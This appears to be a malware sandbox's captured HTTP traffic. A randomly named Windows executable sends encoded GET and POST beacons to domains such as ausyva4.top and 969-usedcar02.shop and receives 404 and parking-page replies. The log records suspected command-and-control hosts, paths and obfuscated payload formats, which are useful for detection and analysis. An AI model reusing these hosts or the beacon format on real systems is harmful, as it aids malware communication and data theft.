Jan 10, 2025 20:25:59.946522951 CET	1158	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:25:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GUOD0Teb%2ByEDmcxv7h8Gb7aUZGH9ZP4RjaHr%2BJsy%2F15ZnL4fJpnhVlPt6pprtU7BJc%2BHCKqRGsAgXKB7VyxTi8mlJxGevLCsa%2BhjiKaX6N19S5WxYb6foC9YlwxDa0jhhOA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff0e5fc8bf43ff-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1694&rtt_var=847&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1753&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb b5 45 2c 21 07 6d 45 a1 6a d1 15 f4 98 36 d3 26 98 66 4a 76 b6 cb fe 7b e9 da 95 22 78 c9 cb 64 e6 7b 4c 78 ea 62 f6 72 57 7c 2e e7 f0 50 3c 2d 60 f9 7e bb 78 bc 83 cb 01 e2 e3 bc b8 47 9c 15 b3 9f ce 68 98 21 ce 9f 2f 75 bf a7 9c ec 42 ab 64 ac 56 e2 25 90 1e 67 63 78 66 81 7b ae a2 55 f8 f3 a8 b0 1d e9 f7 d4 8a 6d 73 d4 35 45 a1 a4 95 cb ff 12 2e d7 0a 4f ed 7e 0f de 38 a5 06 36 9c 40 1c 81 8f 6b 8e 07 8a 9e e2 9a 86 6a 95 50 f7 7b cb 40 a6 24 48 b4 e7 24 20 ce 97 b0 a3 b2 34 5b 02 13 ed 91 09 95 a5 96 df 70 08 5c fb b8 05 1f 37 9c 76 46 3c 47 10 86 aa ec dc 0a 67 e2 17 34 5c c1 81 52 03 bb 6a ed 2e 14 ee 8f 4b 8b 59 05 6a 2f a9 3d ad 7e 7f 5d 4c 15 8a 3d 95 4e 64 3f 45 ac eb 7a 68 aa b2 39 98 f1 50 78 8f 26 5c 8f b1 1b c3 13 dc 59 bc 51 3a 50 3a 77 09 15 5b df d0 c0 d4 e5 20 b2 a5 fc 3f 74 66 84 ce c1 51 36 9a 60 96 63 9e 43 76 35 1d 4d a6 93 9b 3f 28 fe 7e c1 25 d4 4b ae 29 91 85 55 03 1f ca 25 dd a5 22 [TRUNCATED] Data Ascii: 162uAK1{;E,!mEj6&fJv{"xd{LxbrW\|.P<-`~xGh!/uBdV%gcxf{Ums5E.O~86@kjP{@$H$ 4[p\7vF<Gg4\Rj.KYj/=~]L=Nd?Ezh9Px&\YQ:P:w[ ?tfQ6`cCv5M?(~%K)U%">Y7Ka1
Jan 10, 2025 20:25:59.947032928 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	55724	104.21.48.233	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:01.786834955 CET	455	OUT	GET /al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDupCQsZrXlGifKOpb9tUiueuaR7GHXUw== HTTP/1.1 Host: www.ausyva4.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Jan 10, 2025 20:26:02.455705881 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 19:26:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDeRSe7sd2%2Fd9Y5j0JCQVdyO%2BB0qKiGvHSpy79%2BSUKFxUP3s9FF5%2Fst0Pm%2FOaVbDjI7lEHaYWX6qavZZWId9iptpzITgMFBV54sPoVqedgLs0v8qpBqZp5ZWLFGx37v6f3Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fff0e6fd8d880df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=455&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f [TRUNCATED] Data Ascii: 2c0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4o
Jan 10, 2025 20:26:02.455723047 CET	252	IN	Data Raw: 74 72 45 56 44 75 70 43 51 73 5a 72 58 6c 47 69 66 4b 4f 70 62 39 74 55 69 75 65 75 61 52 37 47 48 58 55 77 3d 3d 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6c 75 Data Ascii: trEVDupCQsZrXlGifKOpb9tUiueuaR7GHXUw==</td></tr><tr><td>Server:</td><td>luodiye-aws-node1</td></tr><tr><td>Date:</td><td>2025/01/11 03:26:02</td></tr></table><hr/>Powered by X<hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	55725	199.59.243.228	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:07.552290916 CET	737	OUT	POST /cfcv/ HTTP/1.1 Host: www.969-usedcar02.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 196 Connection: close Origin: http://www.969-usedcar02.shop Referer: http://www.969-usedcar02.shop/cfcv/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 46 68 6d 58 6e 7a 73 6e 45 57 6d 78 50 4e 49 36 77 66 43 34 45 6b 73 68 64 78 46 76 56 55 45 64 65 49 69 6c 6b 4f 64 59 6a 33 64 44 43 71 35 6a 38 52 70 7a 4c 5a 50 32 36 6e 4b 6d 66 62 62 69 43 61 43 4a 7a 6d 44 57 51 31 74 77 66 52 59 74 4f 61 38 57 6a 2f 71 2f 73 38 78 47 6e 4e 65 4a 4c 62 4b 59 62 61 4f 6b 52 47 56 6b 64 4e 48 73 30 53 47 70 39 6c 49 56 48 54 65 37 46 33 61 4e 75 46 2f 56 56 74 49 39 4e 34 69 46 42 33 2f 47 58 61 38 4d 7a 47 52 66 2f 44 64 39 59 32 33 62 33 30 51 51 31 7a 78 42 37 4b 72 4b 4e 4f 53 55 Data Ascii: rVu4SxF=/Hr8eDk/7MGMFhmXnzsnEWmxPNI6wfC4EkshdxFvVUEdeIilkOdYj3dDCq5j8RpzLZP26nKmfbbiCaCJzmDWQ1twfRYtOa8Wj/q/s8xGnNeJLbKYbaOkRGVkdNHs0SGp9lIVHTe7F3aNuF/VVtI9N4iFB3/GXa8MzGRf/Dd9Y23b30QQ1zxB7KrKNOSU
Jan 10, 2025 20:26:08.025763988 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 19:26:07 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 456cf35c-b46c-4ccc-ab4a-385a59d05971 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ== set-cookie: parking_session=456cf35c-b46c-4ccc-ab4a-385a59d05971; expires=Fri, 10 Jan 2025 19:41:07 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 20:26:08.025790930 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDU2Y2YzNWMtYjQ2Yy00Y2NjLWFiNGEtMzg1YTU5ZDA1OTcxIiwicGFnZV90aW1lIjoxNzM2NTM3MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	55726	199.59.243.228	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:10.097136974 CET	761	OUT	POST /cfcv/ HTTP/1.1 Host: www.969-usedcar02.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 220 Connection: close Origin: http://www.969-usedcar02.shop Referer: http://www.969-usedcar02.shop/cfcv/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 67 64 65 6f 53 6c 6a 50 64 59 69 33 64 44 4a 4b 35 6d 79 78 70 38 4c 5a 4c 45 36 6a 4b 6d 66 62 2f 69 43 66 2b 4a 7a 58 44 52 54 46 74 79 55 78 59 76 52 4b 38 57 6a 2f 71 2f 73 38 6c 38 6e 4e 6d 4a 4c 4c 61 59 59 37 4f 6e 59 6d 56 72 56 74 48 73 77 53 47 74 39 6c 49 37 48 53 79 46 46 30 69 4e 75 45 50 56 56 59 6f 38 44 49 69 66 5a 58 2b 77 53 35 4a 42 33 30 77 44 79 53 6c 6c 4a 33 2f 37 35 31 73 4f 6b 42 34 61 75 64 72 74 4b 70 62 38 55 45 58 6a 6b 62 48 67 4d 6f 4a 4f 35 77 45 35 65 47 51 4e 4c 67 3d 3d Data Ascii: rVu4SxF=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmgdeoSljPdYi3dDJK5myxp8LZLE6jKmfb/iCf+JzXDRTFtyUxYvRK8Wj/q/s8l8nNmJLLaYY7OnYmVrVtHswSGt9lI7HSyFF0iNuEPVVYo8DIifZX+wS5JB30wDySllJ3/751sOkB4audrtKpb8UEXjkbHgMoJO5wE5eGQNLg==
Jan 10, 2025 20:26:10.552212000 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 19:26:09 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 7987a3a8-82a3-4f18-b214-720154bb3ad5 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ== set-cookie: parking_session=7987a3a8-82a3-4f18-b214-720154bb3ad5; expires=Fri, 10 Jan 2025 19:41:10 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 20:26:10.552229881 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzk4N2EzYTgtODJhMy00ZjE4LWIyMTQtNzIwMTU0YmIzYWQ1IiwicGFnZV90aW1lIjoxNzM2NTM3MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	55727	199.59.243.228	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:26:12.643238068 CET	1774	OUT	POST /cfcv/ HTTP/1.1 Host: www.969-usedcar02.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Content-Length: 1232 Connection: close Origin: http://www.969-usedcar02.shop Referer: http://www.969-usedcar02.shop/cfcv/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) Data Raw: 72 56 75 34 53 78 46 3d 2f 48 72 38 65 44 6b 2f 37 4d 47 4d 48 42 57 58 6c 51 30 6e 55 47 6d 32 44 74 49 36 36 2f 43 38 45 6b 77 68 64 77 41 71 57 6d 6f 64 65 5a 79 6c 6c 73 31 59 68 33 64 44 45 71 35 6e 79 78 70 62 4c 66 6a 41 36 6a 4f 51 66 64 37 69 44 35 71 4a 31 6c 6e 52 45 31 74 79 4a 68 59 71 4f 61 39 65 6a 37 48 32 73 38 31 38 6e 4e 6d 4a 4c 4f 65 59 50 36 4f 6e 65 6d 56 6b 64 4e 48 61 30 53 47 56 39 6c 77 4e 48 53 48 77 46 45 43 4e 70 6b 66 56 53 38 49 38 46 59 69 5a 61 58 2b 34 53 35 55 42 33 30 74 36 79 53 52 66 4a 77 54 37 34 41 4e 4f 33 6c 6b 6d 73 75 32 61 4b 4a 44 35 51 68 58 35 39 6f 7a 6e 5a 4c 5a 34 73 56 35 4b 52 58 78 42 58 2b 46 48 42 52 32 42 45 76 69 2f 2b 74 66 54 5a 79 67 79 61 43 38 36 4f 57 52 62 50 4b 32 78 7a 32 42 64 51 77 61 42 4f 2f 6c 77 59 74 43 7a 58 30 76 57 4c 7a 65 48 76 62 67 65 50 47 54 55 33 2b 39 41 5a 4e 65 37 54 43 6a 4f 6e 57 50 62 46 47 2f 59 57 62 69 77 4b 61 44 45 35 35 68 71 6e 44 6b 75 65 54 2f 77 6c 43 72 35 4e 57 41 64 46 74 75 4b 7a 6c 4c 70 7a 6c [TRUNCATED] Data Ascii: rVu4SxF=/Hr8eDk/7MGMHBWXlQ0nUGm2DtI66/C8EkwhdwAqWmodeZylls1Yh3dDEq5nyxpbLfjA6jOQfd7iD5qJ1lnRE1tyJhYqOa9ej7H2s818nNmJLOeYP6OnemVkdNHa0SGV9lwNHSHwFECNpkfVS8I8FYiZaX+4S5UB30t6ySRfJwT74ANO3lkmsu2aKJD5QhX59oznZLZ4sV5KRXxBX+FHBR2BEvi/+tfTZygyaC86OWRbPK2xz2BdQwaBO/lwYtCzX0vWLzeHvbgePGTU3+9AZNe7TCjOnWPbFG/YWbiwKaDE55hqnDkueT/wlCr5NWAdFtuKzlLpzlxYK7UN/ULZecSRb4omGblLwpyQzGrz/u+sPH9pKOX1jZj7eNSpPpPoG2xeadH3iaTFGPMzyBVJBw5Phe58aPyjGxYoNPIIr760WslCQbpsV6FhQFUhur6TB8skqI071rLlc+DxTIuoTALLVstoddw+ywXGvL8PSMbRAgm4o5KCSBntRnxMeBVCBY125v5HQlckZwVod/SFYhgDQX+sGw8wpUXgxLt2Mo6iE2qMHhxVH9OUp6cvTb/6ih99+mGK7trAFnTfgoLLJUWhf02Nke/1AdpxamCCAmIqYWGsf7emfkIcsn9YDC4121iGiDFvHGbNwsx00A490JqjZZtKNHnQ1o9aINUX94Sbaoj4X4XyRWKH2W/BPgL5MfOxRCjpQ0Q7lfx9iQNEZ9jfOF1TC2a+mtn+GuGbg3OdY4+ZbKxUaBH7+M6MMVKjD1JwAxfPbOIUx4qluNxIJtcwYdc0GK7YoirVhAV54rHdGGH7SGPvdPkz2+H2HqAsWEPagdzYQ/xKL4SJRw5GJbPxF5mpW1Um14y23y8UM9b90Ql/t+3V7e4yzzqAiPsGnwpZv8nFDJ1GjTlEoF3sGjwxXwEQxjLQOG6SeqYGUq4/SYMoze/xzwgLXE4q04LOtNNlVJqxqMjVwNKWGkpzC4QhB1EAMwN13MZWguPmp4nb [TRUNCATED]
Jan 10, 2025 20:26:13.091089010 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 10 Jan 2025 19:26:12 GMT content-type: text/html; charset=utf-8 content-length: 1138 x-request-id: 546310ff-3f24-4127-96e0-fd71f16ff048 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ== set-cookie: parking_session=546310ff-3f24-4127-96e0-fd71f16ff048; expires=Fri, 10 Jan 2025 19:41:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 39 69 67 35 35 45 33 6e 54 2b 2b 58 39 58 71 6b 7a 4e 47 53 48 32 6b 38 53 30 54 6f 48 64 67 36 71 4a 35 6f 54 38 6a 72 78 71 38 4e 65 32 65 2b 7a 68 6d 37 47 66 6a 44 70 72 59 52 6c 53 5a 78 36 32 73 45 50 74 77 67 6b 5a 79 2b 78 61 49 38 73 57 39 5a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_c9ig55E3nT++X9XqkzNGSH2k8S0ToHdg6qJ5oT8jrxq8Ne2e+zhm7GfjDprYRlSZx62sEPtwgkZy+xaI8sW9ZQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 10, 2025 20:26:13.091110945 CET	591	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQ2MzEwZmYtM2YyNC00MTI3LTk2ZTAtZmQ3MWYxNmZmMDQ4IiwicGFnZV90aW1lIjoxNzM2NTM3MT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	55728	199.59.243.228	80	6180	C:\Program Files (x86)\dPXXiWVSDxKzfLUwmayieFrObYVAaSiCnLexfNoBdvJRwRRREiXBhaWN\kObgmFzfBE.exe

Timestamp	Bytes transferred	Direction	Data
